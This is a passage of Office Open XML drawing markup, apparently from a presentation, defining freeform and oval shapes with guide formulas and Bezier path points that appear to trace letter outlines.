                <a:gd name="T5" fmla="*/ 5 h 24"/>
                <a:gd name="T6" fmla="*/ 4 w 13"/>
                <a:gd name="T7" fmla="*/ 5 h 24"/>
                <a:gd name="T8" fmla="*/ 11 w 13"/>
                <a:gd name="T9" fmla="*/ 0 h 24"/>
                <a:gd name="T10" fmla="*/ 13 w 13"/>
                <a:gd name="T11" fmla="*/ 0 h 24"/>
                <a:gd name="T12" fmla="*/ 12 w 13"/>
                <a:gd name="T13" fmla="*/ 4 h 24"/>
                <a:gd name="T14" fmla="*/ 10 w 13"/>
                <a:gd name="T15" fmla="*/ 3 h 24"/>
                <a:gd name="T16" fmla="*/ 4 w 13"/>
                <a:gd name="T17" fmla="*/ 9 h 24"/>
                <a:gd name="T18" fmla="*/ 4 w 13"/>
                <a:gd name="T19" fmla="*/ 24 h 24"/>
                <a:gd name="T20" fmla="*/ 0 w 13"/>
                <a:gd name="T21" fmla="*/ 24 h 24"/>
                <a:gd name="T22" fmla="*/ 0 w 13"/>
                <a:gd name="T2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4">
                  <a:moveTo>
                    <a:pt x="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2"/>
                    <a:pt x="8" y="0"/>
                    <a:pt x="11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3"/>
                    <a:pt x="11" y="3"/>
                    <a:pt x="10" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="3"/>
                    <a:pt x="6" y="5"/>
                    <a:pt x="4" y="9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4" name="Freeform 53">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{914A32AE-411E-4495-A80D-41C47BA1A0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05788" y="1209675"/>
              <a:ext cx="4762" cy="31750"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 5"/>
                <a:gd name="T1" fmla="*/ 3 h 34"/>
                <a:gd name="T2" fmla="*/ 3 w 5"/>
                <a:gd name="T3" fmla="*/ 0 h 34"/>
                <a:gd name="T4" fmla="*/ 5 w 5"/>
                <a:gd name="T5" fmla="*/ 3 h 34"/>
                <a:gd name="T6" fmla="*/ 3 w 5"/>
                <a:gd name="T7" fmla="*/ 5 h 34"/>
                <a:gd name="T8" fmla="*/ 0 w 5"/>
                <a:gd name="T9" fmla="*/ 3 h 34"/>
                <a:gd name="T10" fmla="*/ 1 w 5"/>
                <a:gd name="T11" fmla="*/ 10 h 34"/>
                <a:gd name="T12" fmla="*/ 5 w 5"/>
                <a:gd name="T13" fmla="*/ 10 h 34"/>
                <a:gd name="T14" fmla="*/ 5 w 5"/>
                <a:gd name="T15" fmla="*/ 34 h 34"/>
                <a:gd name="T16" fmla="*/ 1 w 5"/>
                <a:gd name="T17" fmla="*/ 34 h 34"/>
                <a:gd name="T18" fmla="*/ 1 w 5"/>
                <a:gd name="T1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4">
                  <a:moveTo>
                    <a:pt x="0" y="3"/>
                  </a:move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4"/>
                    <a:pt x="4" y="5"/>
                    <a:pt x="3" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="5"/>
                    <a:pt x="0" y="4"/>
                    <a:pt x="0" y="3"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1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" y="34"/>
                    <a:pt x="1" y="34"/>
                    <a:pt x="1" y="34"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1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5" name="Freeform 54">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C085A2F3-050C-4BEE-8D3C-C1777EE33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20075" y="1219200"/>
              <a:ext cx="15875" cy="23813"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 17"/>
                <a:gd name="T1" fmla="*/ 21 h 25"/>
                <a:gd name="T2" fmla="*/ 2 w 17"/>
                <a:gd name="T3" fmla="*/ 19 h 25"/>
                <a:gd name="T4" fmla="*/ 9 w 17"/>
                <a:gd name="T5" fmla="*/ 21 h 25"/>
                <a:gd name="T6" fmla="*/ 13 w 17"/>
                <a:gd name="T7" fmla="*/ 18 h 25"/>
                <a:gd name="T8" fmla="*/ 8 w 17"/>
                <a:gd name="T9" fmla="*/ 13 h 25"/>
                <a:gd name="T10" fmla="*/ 1 w 17"/>
                <a:gd name="T11" fmla="*/ 6 h 25"/>
                <a:gd name="T12" fmla="*/ 9 w 17"/>
                <a:gd name="T13" fmla="*/ 0 h 25"/>
                <a:gd name="T14" fmla="*/ 16 w 17"/>
                <a:gd name="T15" fmla="*/ 2 h 25"/>
                <a:gd name="T16" fmla="*/ 14 w 17"/>
                <a:gd name="T17" fmla="*/ 5 h 25"/>
                <a:gd name="T18" fmla="*/ 9 w 17"/>
                <a:gd name="T19" fmla="*/ 3 h 25"/>
                <a:gd name="T20" fmla="*/ 5 w 17"/>
                <a:gd name="T21" fmla="*/ 6 h 25"/>
                <a:gd name="T22" fmla="*/ 10 w 17"/>
                <a:gd name="T23" fmla="*/ 10 h 25"/>
                <a:gd name="T24" fmla="*/ 17 w 17"/>
                <a:gd name="T25" fmla="*/ 18 h 25"/>
                <a:gd name="T26" fmla="*/ 8 w 17"/>
                <a:gd name="T27" fmla="*/ 25 h 25"/>
                <a:gd name="T28" fmla="*/ 0 w 17"/>
                <a:gd name="T29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" h="25">
                  <a:moveTo>
                    <a:pt x="0" y="21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4" y="20"/>
                    <a:pt x="6" y="21"/>
                    <a:pt x="9" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="21"/>
                    <a:pt x="13" y="20"/>
                    <a:pt x="13" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="15"/>
                    <a:pt x="10" y="14"/>
                    <a:pt x="8" y="13"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="12"/>
                    <a:pt x="1" y="10"/>
                    <a:pt x="1" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="3"/>
                    <a:pt x="4" y="0"/>
                    <a:pt x="9" y="0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4"/>
                    <a:pt x="11" y="3"/>
                    <a:pt x="9" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="3"/>
                    <a:pt x="5" y="4"/>
                    <a:pt x="5" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="9"/>
                    <a:pt x="7" y="9"/>
                    <a:pt x="10" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="12"/>
                    <a:pt x="17" y="13"/>
                    <a:pt x="17" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="21"/>
                    <a:pt x="14" y="25"/>
                    <a:pt x="8" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="25"/>
                    <a:pt x="2" y="23"/>
                    <a:pt x="0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6" name="Freeform 55">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C64CD68B-438F-4074-8946-B09D5491B3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5475" y="1219200"/>
              <a:ext cx="19050" cy="23813"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 20"/>
                <a:gd name="T1" fmla="*/ 12 h 25"/>
                <a:gd name="T2" fmla="*/ 11 w 20"/>
                <a:gd name="T3" fmla="*/ 0 h 25"/>
                <a:gd name="T4" fmla="*/ 20 w 20"/>
                <a:gd name="T5" fmla="*/ 11 h 25"/>
                <a:gd name="T6" fmla="*/ 20 w 20"/>
                <a:gd name="T7" fmla="*/ 13 h 25"/>
                <a:gd name="T8" fmla="*/ 4 w 20"/>
                <a:gd name="T9" fmla="*/ 13 h 25"/>
                <a:gd name="T10" fmla="*/ 12 w 20"/>
                <a:gd name="T11" fmla="*/ 21 h 25"/>
                <a:gd name="T12" fmla="*/ 18 w 20"/>
                <a:gd name="T13" fmla="*/ 20 h 25"/>
                <a:gd name="T14" fmla="*/ 19 w 20"/>
                <a:gd name="T15" fmla="*/ 22 h 25"/>
                <a:gd name="T16" fmla="*/ 12 w 20"/>
                <a:gd name="T17" fmla="*/ 25 h 25"/>
                <a:gd name="T18" fmla="*/ 0 w 20"/>
                <a:gd name="T19" fmla="*/ 12 h 25"/>
                <a:gd name="T20" fmla="*/ 17 w 20"/>
                <a:gd name="T21" fmla="*/ 10 h 25"/>
                <a:gd name="T22" fmla="*/ 11 w 20"/>
                <a:gd name="T23" fmla="*/ 3 h 25"/>
                <a:gd name="T24" fmla="*/ 4 w 20"/>
                <a:gd name="T25" fmla="*/ 10 h 25"/>
                <a:gd name="T26" fmla="*/ 17 w 20"/>
                <a:gd name="T27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25">
                  <a:moveTo>
                    <a:pt x="0" y="12"/>
                  </a:move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0" y="4"/>
                    <a:pt x="20" y="11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8"/>
                    <a:pt x="8" y="21"/>
                    <a:pt x="12" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="21"/>
                    <a:pt x="16" y="21"/>
                    <a:pt x="18" y="2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23"/>
                    <a:pt x="15" y="25"/>
                    <a:pt x="12" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="25"/>
                    <a:pt x="0" y="20"/>
                    <a:pt x="0" y="12"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="17" y="10"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="5"/>
                    <a:pt x="15" y="3"/>
                    <a:pt x="11" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="3"/>
                    <a:pt x="5" y="6"/>
                    <a:pt x="4" y="10"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="17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7" name="Oval 56">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D452088-D9B7-4FF5-BA2D-39120E8059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6750" y="1220788"/>
              <a:ext cx="4762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8" name="Freeform 57">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2FCFC07-DC47-411B-8390-9B27E6340E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5325" y="1209675"/>
              <a:ext cx="4762" cy="31750"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 5"/>
                <a:gd name="T1" fmla="*/ 3 h 34"/>
                <a:gd name="T2" fmla="*/ 2 w 5"/>
                <a:gd name="T3" fmla="*/ 0 h 34"/>
                <a:gd name="T4" fmla="*/ 5 w 5"/>
                <a:gd name="T5" fmla="*/ 3 h 34"/>
                <a:gd name="T6" fmla="*/ 2 w 5"/>
                <a:gd name="T7" fmla="*/ 5 h 34"/>
                <a:gd name="T8" fmla="*/ 0 w 5"/>
                <a:gd name="T9" fmla="*/ 3 h 34"/>
                <a:gd name="T10" fmla="*/ 0 w 5"/>
                <a:gd name="T11" fmla="*/ 10 h 34"/>
                <a:gd name="T12" fmla="*/ 4 w 5"/>
                <a:gd name="T13" fmla="*/ 10 h 34"/>
                <a:gd name="T14" fmla="*/ 4 w 5"/>
                <a:gd name="T15" fmla="*/ 34 h 34"/>
                <a:gd name="T16" fmla="*/ 0 w 5"/>
                <a:gd name="T17" fmla="*/ 34 h 34"/>
                <a:gd name="T18" fmla="*/ 0 w 5"/>
                <a:gd name="T1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34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4" y="0"/>
                    <a:pt x="5" y="1"/>
                    <a:pt x="5" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="4"/>
                    <a:pt x="4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lose/>
                  <a:moveTo>
                    <a:pt x="0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59" name="Freeform 58">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95F0056B-9EA9-43D3-A62F-EAC1995323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29613" y="1219200"/>
              <a:ext cx="20637" cy="23813"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 22"/>
                <a:gd name="T1" fmla="*/ 12 h 25"/>
                <a:gd name="T2" fmla="*/ 11 w 22"/>
                <a:gd name="T3" fmla="*/ 0 h 25"/>
                <a:gd name="T4" fmla="*/ 22 w 22"/>
                <a:gd name="T5" fmla="*/ 12 h 25"/>
                <a:gd name="T6" fmla="*/ 11 w 22"/>
                <a:gd name="T7" fmla="*/ 25 h 25"/>
                <a:gd name="T8" fmla="*/ 0 w 22"/>
                <a:gd name="T9" fmla="*/ 12 h 25"/>
                <a:gd name="T10" fmla="*/ 18 w 22"/>
                <a:gd name="T11" fmla="*/ 12 h 25"/>
                <a:gd name="T12" fmla="*/ 11 w 22"/>
                <a:gd name="T13" fmla="*/ 3 h 25"/>
                <a:gd name="T14" fmla="*/ 4 w 22"/>
                <a:gd name="T15" fmla="*/ 12 h 25"/>
                <a:gd name="T16" fmla="*/ 11 w 22"/>
                <a:gd name="T17" fmla="*/ 21 h 25"/>
                <a:gd name="T18" fmla="*/ 18 w 22"/>
                <a:gd name="T1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5">
                  <a:moveTo>
                    <a:pt x="0" y="12"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="4"/>
                    <a:pt x="5" y="0"/>
                    <a:pt x="11" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="0"/>
                    <a:pt x="22" y="4"/>
                    <a:pt x="22" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="20"/>
                    <a:pt x="17" y="25"/>
                    <a:pt x="11" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="25"/>
                    <a:pt x="0" y="20"/>
                    <a:pt x="0" y="12"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="18" y="12"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="18" y="7"/>
                    <a:pt x="15" y="3"/>
                    <a:pt x="11" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="3"/>
                    <a:pt x="4" y="7"/>
                    <a:pt x="4" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="18"/>
                    <a:pt x="7" y="21"/>
                    <a:pt x="11" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="21"/>
                    <a:pt x="18" y="18"/>
                    <a:pt x="1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0" name="Freeform 59">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E5FA61E-564D-4885-B534-8463DF533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188" y="1212850"/>
              <a:ext cx="14287" cy="30163"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 4 w 15"/>
                <a:gd name="T1" fmla="*/ 23 h 31"/>
                <a:gd name="T2" fmla="*/ 4 w 15"/>
                <a:gd name="T3" fmla="*/ 10 h 31"/>
                <a:gd name="T4" fmla="*/ 0 w 15"/>
                <a:gd name="T5" fmla="*/ 10 h 31"/>
                <a:gd name="T6" fmla="*/ 0 w 15"/>
                <a:gd name="T7" fmla="*/ 7 h 31"/>
                <a:gd name="T8" fmla="*/ 4 w 15"/>
                <a:gd name="T9" fmla="*/ 6 h 31"/>
                <a:gd name="T10" fmla="*/ 4 w 15"/>
                <a:gd name="T11" fmla="*/ 0 h 31"/>
                <a:gd name="T12" fmla="*/ 8 w 15"/>
                <a:gd name="T13" fmla="*/ 0 h 31"/>
                <a:gd name="T14" fmla="*/ 8 w 15"/>
                <a:gd name="T15" fmla="*/ 6 h 31"/>
                <a:gd name="T16" fmla="*/ 14 w 15"/>
                <a:gd name="T17" fmla="*/ 6 h 31"/>
                <a:gd name="T18" fmla="*/ 14 w 15"/>
                <a:gd name="T19" fmla="*/ 10 h 31"/>
                <a:gd name="T20" fmla="*/ 8 w 15"/>
                <a:gd name="T21" fmla="*/ 10 h 31"/>
                <a:gd name="T22" fmla="*/ 8 w 15"/>
                <a:gd name="T23" fmla="*/ 23 h 31"/>
                <a:gd name="T24" fmla="*/ 11 w 15"/>
                <a:gd name="T25" fmla="*/ 27 h 31"/>
                <a:gd name="T26" fmla="*/ 14 w 15"/>
                <a:gd name="T27" fmla="*/ 27 h 31"/>
                <a:gd name="T28" fmla="*/ 15 w 15"/>
                <a:gd name="T29" fmla="*/ 30 h 31"/>
                <a:gd name="T30" fmla="*/ 10 w 15"/>
                <a:gd name="T31" fmla="*/ 31 h 31"/>
                <a:gd name="T32" fmla="*/ 4 w 15"/>
                <a:gd name="T33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31">
                  <a:moveTo>
                    <a:pt x="4" y="23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6"/>
                    <a:pt x="9" y="27"/>
                    <a:pt x="11" y="27"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="27"/>
                    <a:pt x="13" y="27"/>
                    <a:pt x="14" y="27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0"/>
                    <a:pt x="12" y="31"/>
                    <a:pt x="10" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="31"/>
                    <a:pt x="4" y="27"/>
                    <a:pt x="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1" name="Oval 60">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FED06988-4CCD-4E9D-B743-F2F787CC2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3113" y="1220788"/>
              <a:ext cx="4762" cy="63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2" name="Freeform 61">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C77CC9AB-7C3A-4E0D-B855-C18F5E90B4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3275" y="1208088"/>
              <a:ext cx="19050" cy="34925"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 3 w 20"/>
                <a:gd name="T1" fmla="*/ 33 h 36"/>
                <a:gd name="T2" fmla="*/ 3 w 20"/>
                <a:gd name="T3" fmla="*/ 33 h 36"/>
                <a:gd name="T4" fmla="*/ 3 w 20"/>
                <a:gd name="T5" fmla="*/ 35 h 36"/>
                <a:gd name="T6" fmla="*/ 0 w 20"/>
                <a:gd name="T7" fmla="*/ 35 h 36"/>
                <a:gd name="T8" fmla="*/ 0 w 20"/>
                <a:gd name="T9" fmla="*/ 0 h 36"/>
                <a:gd name="T10" fmla="*/ 4 w 20"/>
                <a:gd name="T11" fmla="*/ 0 h 36"/>
                <a:gd name="T12" fmla="*/ 4 w 20"/>
                <a:gd name="T13" fmla="*/ 10 h 36"/>
                <a:gd name="T14" fmla="*/ 3 w 20"/>
                <a:gd name="T15" fmla="*/ 14 h 36"/>
                <a:gd name="T16" fmla="*/ 11 w 20"/>
                <a:gd name="T17" fmla="*/ 11 h 36"/>
                <a:gd name="T18" fmla="*/ 20 w 20"/>
                <a:gd name="T19" fmla="*/ 23 h 36"/>
                <a:gd name="T20" fmla="*/ 10 w 20"/>
                <a:gd name="T21" fmla="*/ 36 h 36"/>
                <a:gd name="T22" fmla="*/ 3 w 20"/>
                <a:gd name="T23" fmla="*/ 33 h 36"/>
                <a:gd name="T24" fmla="*/ 16 w 20"/>
                <a:gd name="T25" fmla="*/ 23 h 36"/>
                <a:gd name="T26" fmla="*/ 10 w 20"/>
                <a:gd name="T27" fmla="*/ 14 h 36"/>
                <a:gd name="T28" fmla="*/ 4 w 20"/>
                <a:gd name="T29" fmla="*/ 17 h 36"/>
                <a:gd name="T30" fmla="*/ 4 w 20"/>
                <a:gd name="T31" fmla="*/ 30 h 36"/>
                <a:gd name="T32" fmla="*/ 9 w 20"/>
                <a:gd name="T33" fmla="*/ 32 h 36"/>
                <a:gd name="T34" fmla="*/ 16 w 20"/>
                <a:gd name="T35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36">
                  <a:moveTo>
                    <a:pt x="3" y="33"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="33"/>
                    <a:pt x="3" y="33"/>
                    <a:pt x="3" y="33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6" y="12"/>
                    <a:pt x="8" y="11"/>
                    <a:pt x="11" y="11"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="11"/>
                    <a:pt x="20" y="16"/>
                    <a:pt x="20" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="31"/>
                    <a:pt x="15" y="36"/>
                    <a:pt x="10" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="36"/>
                    <a:pt x="5" y="34"/>
                    <a:pt x="3" y="33"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="16" y="23"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="16" y="18"/>
                    <a:pt x="14" y="14"/>
                    <a:pt x="10" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="14"/>
                    <a:pt x="6" y="15"/>
                    <a:pt x="4" y="17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2"/>
                    <a:pt x="8" y="32"/>
                    <a:pt x="9" y="32"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="32"/>
                    <a:pt x="16" y="29"/>
                    <a:pt x="16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3" name="Freeform 62">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8B2AFEF-7505-4FEA-B22E-8D97DFC256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850" y="1208088"/>
              <a:ext cx="6350" cy="34925"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 7"/>
                <a:gd name="T1" fmla="*/ 30 h 36"/>
                <a:gd name="T2" fmla="*/ 0 w 7"/>
                <a:gd name="T3" fmla="*/ 0 h 36"/>
                <a:gd name="T4" fmla="*/ 4 w 7"/>
                <a:gd name="T5" fmla="*/ 0 h 36"/>
                <a:gd name="T6" fmla="*/ 4 w 7"/>
                <a:gd name="T7" fmla="*/ 31 h 36"/>
                <a:gd name="T8" fmla="*/ 6 w 7"/>
                <a:gd name="T9" fmla="*/ 32 h 36"/>
                <a:gd name="T10" fmla="*/ 6 w 7"/>
                <a:gd name="T11" fmla="*/ 32 h 36"/>
                <a:gd name="T12" fmla="*/ 7 w 7"/>
                <a:gd name="T13" fmla="*/ 35 h 36"/>
                <a:gd name="T14" fmla="*/ 5 w 7"/>
                <a:gd name="T15" fmla="*/ 36 h 36"/>
                <a:gd name="T16" fmla="*/ 0 w 7"/>
                <a:gd name="T17" fmla="*/ 3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36">
                  <a:moveTo>
                    <a:pt x="0" y="3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32"/>
                    <a:pt x="5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5"/>
                    <a:pt x="6" y="36"/>
                    <a:pt x="5" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="36"/>
                    <a:pt x="0" y="34"/>
                    <a:pt x="0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4" name="Freeform 63">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C54E6B54-BF03-44AC-9B6B-C1F5057210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67725" y="1219200"/>
              <a:ext cx="20637" cy="23813"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 22"/>
                <a:gd name="T1" fmla="*/ 12 h 25"/>
                <a:gd name="T2" fmla="*/ 11 w 22"/>
                <a:gd name="T3" fmla="*/ 0 h 25"/>
                <a:gd name="T4" fmla="*/ 22 w 22"/>
                <a:gd name="T5" fmla="*/ 12 h 25"/>
                <a:gd name="T6" fmla="*/ 11 w 22"/>
                <a:gd name="T7" fmla="*/ 25 h 25"/>
                <a:gd name="T8" fmla="*/ 0 w 22"/>
                <a:gd name="T9" fmla="*/ 12 h 25"/>
                <a:gd name="T10" fmla="*/ 18 w 22"/>
                <a:gd name="T11" fmla="*/ 12 h 25"/>
                <a:gd name="T12" fmla="*/ 11 w 22"/>
                <a:gd name="T13" fmla="*/ 3 h 25"/>
                <a:gd name="T14" fmla="*/ 4 w 22"/>
                <a:gd name="T15" fmla="*/ 12 h 25"/>
                <a:gd name="T16" fmla="*/ 11 w 22"/>
                <a:gd name="T17" fmla="*/ 21 h 25"/>
                <a:gd name="T18" fmla="*/ 18 w 22"/>
                <a:gd name="T19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5">
                  <a:moveTo>
                    <a:pt x="0" y="12"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="4"/>
                    <a:pt x="5" y="0"/>
                    <a:pt x="11" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="16" y="0"/>
                    <a:pt x="22" y="4"/>
                    <a:pt x="22" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="20"/>
                    <a:pt x="16" y="25"/>
                    <a:pt x="11" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="25"/>
                    <a:pt x="0" y="20"/>
                    <a:pt x="0" y="12"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="18" y="12"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="18" y="7"/>
                    <a:pt x="15" y="3"/>
                    <a:pt x="11" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="3"/>
                    <a:pt x="4" y="7"/>
                    <a:pt x="4" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="18"/>
                    <a:pt x="7" y="21"/>
                    <a:pt x="11" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="21"/>
                    <a:pt x="18" y="18"/>
                    <a:pt x="18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5" name="Freeform 64">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C686A33-7F0B-442A-B6A4-8C5EB9AFEF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6300" y="1219200"/>
              <a:ext cx="17462" cy="23813"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 19"/>
                <a:gd name="T1" fmla="*/ 12 h 25"/>
                <a:gd name="T2" fmla="*/ 12 w 19"/>
                <a:gd name="T3" fmla="*/ 0 h 25"/>
                <a:gd name="T4" fmla="*/ 19 w 19"/>
                <a:gd name="T5" fmla="*/ 3 h 25"/>
                <a:gd name="T6" fmla="*/ 17 w 19"/>
                <a:gd name="T7" fmla="*/ 5 h 25"/>
                <a:gd name="T8" fmla="*/ 12 w 19"/>
                <a:gd name="T9" fmla="*/ 3 h 25"/>
                <a:gd name="T10" fmla="*/ 4 w 19"/>
                <a:gd name="T11" fmla="*/ 12 h 25"/>
                <a:gd name="T12" fmla="*/ 12 w 19"/>
                <a:gd name="T13" fmla="*/ 21 h 25"/>
                <a:gd name="T14" fmla="*/ 17 w 19"/>
                <a:gd name="T15" fmla="*/ 19 h 25"/>
                <a:gd name="T16" fmla="*/ 19 w 19"/>
                <a:gd name="T17" fmla="*/ 22 h 25"/>
                <a:gd name="T18" fmla="*/ 11 w 19"/>
                <a:gd name="T19" fmla="*/ 25 h 25"/>
                <a:gd name="T20" fmla="*/ 0 w 19"/>
                <a:gd name="T21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" h="25">
                  <a:moveTo>
                    <a:pt x="0" y="12"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="4"/>
                    <a:pt x="6" y="0"/>
                    <a:pt x="12" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="0"/>
                    <a:pt x="17" y="1"/>
                    <a:pt x="19" y="3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5" y="4"/>
                    <a:pt x="14" y="3"/>
                    <a:pt x="12" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="3"/>
                    <a:pt x="4" y="7"/>
                    <a:pt x="4" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="18"/>
                    <a:pt x="7" y="21"/>
                    <a:pt x="12" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="21"/>
                    <a:pt x="16" y="20"/>
                    <a:pt x="17" y="19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7" y="23"/>
                    <a:pt x="14" y="25"/>
                    <a:pt x="11" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="25"/>
                    <a:pt x="0" y="20"/>
                    <a:pt x="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6" name="Freeform 65">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
